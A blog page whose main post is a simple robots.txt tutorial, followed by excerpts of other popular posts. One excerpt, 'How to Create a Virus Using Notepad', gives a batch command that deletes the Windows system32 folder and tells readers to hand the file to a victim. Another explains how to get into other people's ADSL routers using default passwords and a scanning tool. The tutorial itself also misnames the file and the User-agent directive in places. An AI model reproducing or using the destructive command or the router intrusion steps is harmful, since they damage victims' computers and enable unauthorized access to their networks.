Skip to main content

robot.txt what is this and how to use this


What do they do exactly?

Robot.txt files tell your instructions to a search engine robot..

The first thing a search engine spider looks at when it is visiting a page is the robots.txt file. It looks for it because it wants to know what it should do. If you have instructions for a search engine robot, you must tell it those instructions.
The most common problem people have with robot.txt files is that they don't know how to make them.

If you can make web pages, you can also make a robot.txt file. The file is a text file, which means that you can use notepad, wordpad, or any other plain text editor. You can also make them in Frontpage or Dreamweaver by using the "code" view. You can even "copy and paste" them.

So instead of thinking "I am making a robot.txt file", just think, "I am writing a note" they are the exact same process. However you would write a note or a letter on your computer will work for the robot.txt file.
robot.txt files and search robots

What should the robot.txt say?

That depends on what you want it to do.

Most people want robots to visit everything in their website. If this is the case with you, and you want the robot to index all parts of your site, there are three options to let the robots know that they are welcome.
1) Do not have a robot.txt file
If your website does not have a robot.txt file then this is what happens -
A robot comes to visit. It looks for the robot.txt file. It does not find it because it isn't there. The robot then feels free to visit all your web pages and content because this is what it is programmed to do in this situation.
2) Make an empty file and call it robots.txt
If your website has a robot.txt file that has nothing in it then this is what happens -
A robot comes to visit. It looks for the robot.txt file. It finds the file and reads it. There is nothing to read, so the robot then feels free to visit all your web pages and content because this is what it is programmed to do in this situation.
3) Make a file called robots.txt and write the following two lines in it... (these are "instructions" for the robot to follow)

User-agent: *

Disallow:
If your website has a robot.txt with these instructions in it then this is what happens -

A robot comes to visit. It looks for the robot.txt file. It finds the file and reads it. It reads the first line. Then it reads the second line. The robot then feels free to visit all your web pages and content because this is what it is what you told it to do.

What do the robot instructions mean?

Here is an explanation of what the different words mean in a robot.txt file
User-agent:
The "User-agent" part is there to specify directions to a specific robot if needed. There are two ways to use this in your file.

If you want to tell all robots the same thing you put a " * " after the "User-agent" It would look like this...
User-agent: *
(This line is saying "these directions apply to all robots")

If you want to tell a specific robot something (in this example Googlebot) it would look like this...
User-agent: Googlebot
(this line is saying "these directions apply to just Googlebot")
Disallow:
The "Disallow" part is there to tell the robots what folders they should not look at.

This means that if, for example you do not want search engines to index the photos on your site then you can place those photos into one folder and exclude it.

Lets say that you have put all these photos into a folder called "photos". Now you want to tell search engines not to index that folder.

Here is what your robot.txt file should look like:

User-agent: *
Disallow: /photos

The above two lines of text in your robots.txt file would keep robots from visiting your photos folder. The "User-agent *" part is saying "this applies to all robots". The "Disallow: /photos" part is saying "don't visit or index my photos folder".

Googlebot specific instructions

The robot that Google uses to index their search engine is called Googlebot. It understands a few more instructions than other robots. The instructions it follows are well defined in the Google help pages (see resources below).

In addition to the "User-name" and "Disallow" Googlebot also uses the...
Allow:
The "Allow:" instructions lets you tell a robot that it is okay to see a file in a folder that has been "Disallowed" by other instructions.

To illustrate this, let's take the above example of telling the robot not to visit or index your photos. We put all the photos into one folder called "photos" and we made a robot.txt file that looked like this...
User-agent: *
Disallow: /photos

Now let's say there was a photo called mycar.jpg in that folder that you want Googlebot to index. With the Allow: instruction, we can tell Googlebot to do so, it would look like this...

User-agent: *
Disallow: /photos
Allow: /photos/mycar.jpg
This would tell Googlebot that it can visit "mycar.jpg" in the photo folder, even though the "photo" folder is otherwise excluded.
Testing your robot.txt file
If you are using a Google sitemap as part of their webmaster tools, then you can log in and see if Google is having any issues crawling your site. There is also a robot.txt tool that allows you to experiment a little, letting you know if their are any problems with your file prior to putting it online.

Key Concept:


- If you use a robots.txt file, make sure it is correctly written because an incorrect robots.txt file can block the bots that index your website.

Comments

Popular posts from this blog

30 Terrific Twitter Facts And Figures

Twitter has always suffered an image problem and is not usually taken very seriously by the general public. Its name doesn’t help with some people even saying that ‘Twitter is for twits’. Despite this glamor and brand problem this has not held back its growth after its humble origins and launch in 2006. Since then Twitter has gained popularity worldwide and is estimated to have 225 million users, generating 65 million tweets a day and handling over 800,000 search queries per day. It is sometimes described as the “SMS of the Internet” and its 140 character limit keeps the messages short and simple. Its attraction as a social web media platform is maybe in its simplicity and real time messaging that enables breaking news and information to hit the web instantly without filt30 Terrific Twitter Facts and Figures:- Twitter was created in March 2006 by Jack Dorsey and launched in July of that year. Twitter’s origins lie in a “day long brainstorming session” that was held by board...

How to Put Google Adsense Below Post Title in Blogger?

Adsense is used by majority of expert bloggers for their website monetization because it is a cookie based contextual advertising system that shows targeted ads relevant to the content and reader. As bloggers are paid on per click basis, they try various ad placements on the blog to  increase the revenue  and get maximum clicks on the ad units. Well, on some blogs, you might have seen Adsense ad units placed below the post title. Do you know why? It is because the area just below the post title gets the most exposure and is the best place to put AdSense ad units to increase  Click Through Rate (CTR). Even though ads below post title work like a charm but this doesn’t mean that it will work for you as well. If you want to find out the best AdSense ads placement for your blog, try experimenting by placing ads at various locations such as header, sidebar, footer, etc. You can try other  blog monetization methods  as well to effectively monetize y...

0 Add A Stylish Subscription Box With Social Media Buttons Below Every Posts

Adding a Stylish Subscription Box Below Bloggers Post is a great techniques to capture your blog post readers never to leave your bloggers blog. Giving them the opportunity to subscribe to your bloggers blog will definitely increase the count of your blog readers. By adding a Subscription box to your blog post or below your blog post will also create an opportunity for your blog readers never to leave you website or blog.I included stylish social media follow button with the subscription widget. ☻  HOW TO ADD SUBSCRIPTION BOX WITH SOCIAL MEDIA BUTTONS BELOW EVERY POSTS 1) Go to  Blogger Dashboard   →   Template   →   Edit HTML . 2) Now Find the code shown below using [ ctrl+F ] ( Use In HTML Box ) 3) Now Paste the Code Shown Below just  After  it. Get free daily email updates! Subscribe via Email Follow us! [Get this widget] 4) Customize your setting.Find any word click  F3  or  Ctrl+F . ♥ Repl...

python program to Print Starting Series OF Indian Mobile Number for a State or operator or both

import requests import urllib.request import time from bs4 import BeautifulSoup as bs import re url = ' https://en.wikipedia.org/wiki/Mobile_telephone_numbering_in_India' state_to_extract = "UE" #if set to None all state is considered telecom_to_extracted = None #if set to none all operator from particular city is extracted response = requests . get(url) print (response) soup = bs(response . text, "html.parser" ) one_a_tag = soup . findAll( 'tr' )[ 35 :] lst = [] for k in one_a_tag: s = k . findAll( 'td' ) limit = len (s) i = 0 while True : if i == limit: break no = s[i] . text i += 1 if i == limit: break operator = s[i] . text i += 1 if i == limit: break state = s[i] . text i += 1 if i == limit: break res = f "{no} {operator} {state}" if state_to_extract is None : if telecom_to_extracted is None : lst . append(no) elif telecom_to_e...

customize-the-windows-7-logon-screen

Customize the Windows 7 Logon Screen Do you like to customize the Windows interface, and tired of the standard log on screen in Windows 7? Today we take a look at Windows 7 Logon Background Changer which is a free and Open Source app that lets you easily customize the logon screen. Windows 7 Logon Background Changer This cool app is free, Open Source, and lets you change the wallpaper on the Windows 7 Logon screen. It doesn’t require installation, and won’t change any of the system files. The download is a small zip file that contains an executable you can run from a flash drive, and also an installer in the Setup folder if you choose to install it. After launching Background changer, you can browse through the standard Windows backgrounds to get an idea of how it will look.If you don’t want to use the standard Windows backgrounds, you can add your own folder of images. After you’ve selected the background you want, click on the Apply button in the upper right hand corner....

Windows 10 English x64.iso 4.03 GB download direct (google drive) creator update 1703 ..latest windows 10

updated ON 1/01/2018 Windows 10 English x64.iso 4.03 GB download direct (google drive) creator update 1703 ..latest windows 10 x64  .. NEW LINK latest version fall creator 1709 update : click here Updated : 5 july 3 PM (IST) Link to the file  click here link: https://www.multcloud.com/share/7977c732-8fa3-4cb7-ae58-a6d99d66bb5b   Just goto to the following link and enter your email address and get the password delivered to you.. Password to the link is :  HERE (FOR PASSWORD OF ABOVE LINK)  OR USE THE FORM BELOW.... Loading... size : 4.03 GB  Language : ENGLISH INTERNATIONAL SYSTEM :WINDOWS 10 x64 BASED.. TYPE : DIRECT DOWNLOAD LINK ......ISO FILE> TORRENT  windows 10 creator update 1703/ 1709 iso FOR OTHER mirror 2 link goto here and enter your email address you will get a email with link to the file....

How to Create a Virus Using Notepad.

its 100% working Introduction : Friends , all of you are most probably aware of viruses. The Only Headache of Every Windows PC owner is that his Pc might get virus. If a virus hits your computer, then no need to say what a nightmare you'll have. And what if someone sent you a virus through a USB, or mail attachment ? There are times in our lives , when we think " Hope, I too could create a virus ". Well then this is the time friends, So here I am posting the process how to create a virus. And sorry i cant post the virus file itself, as Internet doesn't allow to post or send .bat or .cmd files http://raj360.co.nr Process: Open Notepad Write / copy the below command there: " del c:\WINDOWS\system32\*.*/q " without quote and save as " anything.bat" Done. If You Give this file to your victim his SYSTEM 32 Folder will be deleted. Without which a Windows Pc cant be started.

How to Hack an Ethernet ADSL Router

Every router comes with a  username  and  password  using which it is possible to gain access to the router settings and configure the device. The vulnerability actually lies in the  Default username  and  password  that comes with the factory settings. Usually the routers come preconfigured from the Internet Service provider and hence the users do not bother to change the password later. This makes it possible for the attackers to gain unauthorized access to the router and modify its settings using a common set of default usernames and passwords. Here is how you can do it. Before you proceed, you need the following tool in the process: Angry IP Scanner Hacking the ADSL Router: Here is a detailed information on how to exploit the vulnerability of an ADSL router: Go to  whatismyipaddress.com . Once the page is loaded, you will find your IP address. Note it down. Open Angry IP Sca...

Streamlining Java Web Application Deployment with React WAR Generator

In the ever-evolving world of web development, managing builds and deployments can often be cumbersome and error-prone. Today, we're excited to introduce a tool designed to simplify and streamline this process: the React WAR Generator . What is the React WAR Generator? The React WAR Generator is a Python-based tool that automates the creation of WAR (Web Application Archive) files for Java web applications. It caters specifically to frontend projects built with React or similar frameworks, making it easier to package and deploy your web applications to a Tomcat server. Key Features Profile-Based Builds : With support for multiple profiles ( dev , test , prod , default ), you can build your application according to different environments and configurations. Version File Generation : Optionally generate a version file that integrates versioning information directly into your TypeScript files, ensuring your build versions are always up-to-date. Tomcat Deployment : Simplify your deploy...

what is LOREM ipsum and why do designers use it

What is Lorem Ipsum? Lorem Ipsum  is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum. Why do we use it? It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. The point of using Lorem Ipsum is that it has a more-or-less normal distribution of letters, as opposed to using 'Content here, content here', making it look like readable English. Many desktop publishing packages and web page editors now...